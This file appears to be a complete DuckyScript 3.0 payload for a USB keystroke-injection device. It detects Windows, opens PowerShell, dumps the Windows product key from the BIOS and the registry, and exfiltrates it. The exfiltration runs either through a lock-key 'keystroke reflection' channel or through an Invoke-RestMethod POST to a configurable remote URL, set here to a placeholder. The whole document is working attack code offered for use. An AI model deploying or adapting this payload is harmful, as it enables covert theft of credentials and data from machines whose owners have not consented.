167 lines
6.0 KiB
Plaintext
167 lines
6.0 KiB
Plaintext
|
REM WindowsLicenseKeyExfiltration
|
||
|
REM Version 1.0
|
||
|
REM OS: Windows
|
||
|
REM Author: 0iphor13
|
||
|
REM Requirement: DuckyScript 3.0
|
||
|
REM This small powershell payload dumps the Windows license key, which can be either saved within the Bios and/or in the registry.
|
||
|
|
||
|
REM Extension made by Korben for checking if Target is Windows OS
|
||
|
EXTENSION EXTENSION PASSIVE_WINDOWS_DETECT
|
||
|
REM VERSION 1.1
|
||
|
REM AUTHOR: Korben
|
||
|
|
||
|
REM_BLOCK DOCUMENTATION
|
||
|
Windows fully passive OS Detection and passive Detect Ready
|
||
|
Includes its own passive detect ready.
|
||
|
Does not require additional extensions.
|
||
|
|
||
|
USAGE:
|
||
|
Extension runs inline (here)
|
||
|
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||
|
boot delay
|
||
|
$_OS will be set to WINDOWS or NOT_WINDOWS
|
||
|
See end of payload for usage within payload
|
||
|
END_REM
|
||
|
|
||
|
REM CONFIGURATION:
|
||
|
DEFINE #MAX_WAIT 150
|
||
|
DEFINE #CHECK_INTERVAL 20
|
||
|
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
|
||
|
DEFINE #NOT_WINDOWS 7
|
||
|
|
||
|
$_OS = #NOT_WINDOWS
|
||
|
|
||
|
VAR $MAX_TRIES = #MAX_WAIT
|
||
|
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
|
||
|
DELAY #CHECK_INTERVAL
|
||
|
$MAX_TRIES = ($MAX_TRIES - 1)
|
||
|
END_WHILE
|
||
|
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
|
||
|
$_OS = WINDOWS
|
||
|
END_IF
|
||
|
|
||
|
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
|
||
|
IF ($_OS == WINDOWS) THEN
|
||
|
STRING HELLO WINDOWS!
|
||
|
ELSE
|
||
|
STRING HELLO WORLD!
|
||
|
END_IF
|
||
|
END_REM
|
||
|
END_EXTENSION
|
||
|
|
||
|
REM Extension made by 0iphor13 to signalize the payloads end
|
||
|
EXTENSION DETECT_FINISHED
|
||
|
REM VERSION 1.0
|
||
|
REM AUTHOR: 0iphor13
|
||
|
|
||
|
REM_BLOCK DOCUMENTATION
|
||
|
USAGE:
|
||
|
Use the function Detect_Finished() to signal the finished execution of your payload.
|
||
|
END_REM
|
||
|
|
||
|
REM CONFIGURATION:
|
||
|
DEFINE #PAUSE 150
|
||
|
FUNCTION Detect_Finished()
|
||
|
IF ($_CAPSLOCK_ON == FALSE)
|
||
|
CAPSLOCK
|
||
|
DELAY #PAUSE
|
||
|
CAPSLOCK
|
||
|
DELAY #PAUSE
|
||
|
CAPSLOCK
|
||
|
DELAY #PAUSE
|
||
|
CAPSLOCK
|
||
|
ATTACKMODE OFF
|
||
|
ELSE IF
|
||
|
CAPSLOCK
|
||
|
DELAY #PAUSE
|
||
|
CAPSLOCK
|
||
|
DELAY #PAUSE
|
||
|
CAPSLOCK
|
||
|
ATTACKMODE OFF
|
||
|
END_IF
|
||
|
END_FUNCTION
|
||
|
END_EXTENSION
|
||
|
|
||
|
REM Extension made by 0iphor13 for fileless exfiltration via Lock Keys
|
||
|
EXTENSION WINDOWS_FILELESS_HID_EXFIL
|
||
|
REM VERSION 1.0
|
||
|
REM AUTHOR: 0iphor13
|
||
|
|
||
|
REM_BLOCK DOCUMENTATION
|
||
|
Extension for Keystroke Reflection data exfiltration without putting files on disk.
|
||
|
This extension is a proof of concept for USB HID only Data Exfiltration and is based on Hak5s original Method.
|
||
|
|
||
|
TARGET:
|
||
|
Windows Hosts that supports powershell and SendKeys
|
||
|
|
||
|
USAGE:
|
||
|
Type out your command or script with powershell, don't execute it yet (so just type it out with STRING), afterwards you put the function Windows_Fileless_HID_Exfil() behind it.
|
||
|
It'll take the commands/scritps output and writes it into a variable, which then gets exfiltrated.
|
||
|
|
||
|
Example Usage:
|
||
|
GUI r
|
||
|
DELAY 500
|
||
|
STRINGLN powershell
|
||
|
DELAY 1000
|
||
|
STRING echo "This is my test"
|
||
|
Windows_Fileless_HID_Exfil()
|
||
|
END_REM
|
||
|
|
||
|
FUNCTION Windows_Fileless_HID_Exfil()
|
||
|
DELAY 250
|
||
|
REM Saving current Keyboard lock keys
|
||
|
SAVE_HOST_KEYBOARD_LOCK_STATE
|
||
|
$_EXFIL_MODE_ENABLED = TRUE
|
||
|
$_EXFIL_LEDS_ENABLED = TRUE
|
||
|
DELAY 500
|
||
|
REM Setting the output as variable
|
||
|
STRING |Out-String|Set-Variable -Name "DD";
|
||
|
REM Converting output into Lock Key values
|
||
|
STRING $BL = $DD.ToCharArray();$c = "";foreach ($b in $BL){foreach ($a in 0x80,0x40,0x20,0x10,0x08,0x04,0x02,0x01){if ($b -band $a){$c += '%{NUMLOCK}'}else{$c += '%{CAPSLOCK}'}}}$c += '%{SCROLLLOCK}';
|
||
|
REM Exfiltrating via Keystroke Reflection
|
||
|
STRINGLN Add-Type -A System.Windows.Forms;[System.Windows.Forms.SendKeys]::SendWait($c);exit
|
||
|
REM The final SCROLLLOCK value will be sent to indicate that EXFIL is complete.
|
||
|
WAIT_FOR_SCROLL_CHANGE
|
||
|
LED_G
|
||
|
$_EXFIL_MODE_ENABLED = FALSE
|
||
|
RESTORE_HOST_KEYBOARD_LOCK_STATE
|
||
|
END_FUNCTION
|
||
|
END_EXTENSION
|
||
|
|
||
|
REM If set to TRUE, keys will be send via PowerShells Invoke-Restmethod
|
||
|
DEFINE #REMOTE_EXFIL FALSE
|
||
|
REM Define the remote host to which the keys shall be send to. (Only when REMOTE_EXFIL is set to TRUE!)
|
||
|
DEFINE #URL https://example.com/
|
||
|
|
||
|
REM If Target is Windows, execute payload
|
||
|
IF ($_OS == WINDOWS) THEN
|
||
|
GUI r
|
||
|
DELAY 500
|
||
|
STRINGLN powershell -nop -noni
|
||
|
DELAY 1000
|
||
|
STRINGLN Write-Host "[+]Attempting exfiltration of Windows Product Keys..." -ForegroundColor Green
|
||
|
DELAY 300
|
||
|
REM Dumping License key when saved in Bios
|
||
|
STRING $Get_License = "echo 'Product Key in Bios:';(Get-WmiObject -query 'select * from SoftwareLicensingService').OA3xOriginalProductKey;
|
||
|
REM Dumping License key via registry
|
||
|
STRING Get-ItemProperty -Path 'Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -name BackupProductKeyDefault | Select-Object BackupProductKeyDefault"
|
||
|
REM Executing Get_License
|
||
|
STRING ;IeX $Get_License
|
||
|
|
||
|
REM If REMOTE_EXFIL is set to TRUE,exfiltrate keys to remote host
|
||
|
IF_DEFINED_TRUE #REMOTE_EXFIL
|
||
|
DELAY 500
|
||
|
REM Setting the output as variable & sending it to defined remote host
|
||
|
STRINGLN |Out-String|Set-Variable -Name "DD";Invoke-Restmethod -UseBasicParsing -Method Post -Uri "#URL" -Body $DD;exit
|
||
|
DELAY 150
|
||
|
Detect_Finished()
|
||
|
ELSE_DEFINED
|
||
|
REM Exfiltrating License key via Keystroke Reflection
|
||
|
Windows_Fileless_HID_Exfil()
|
||
|
DELAY 150
|
||
|
Detect_Finished()
|
||
|
END_IF_DEFINED
|
||
|
REM If System is not Windows...
|
||
|
ELSE
|
||
|
ATTACKMODE STORAGE
|
||
|
END_IF
|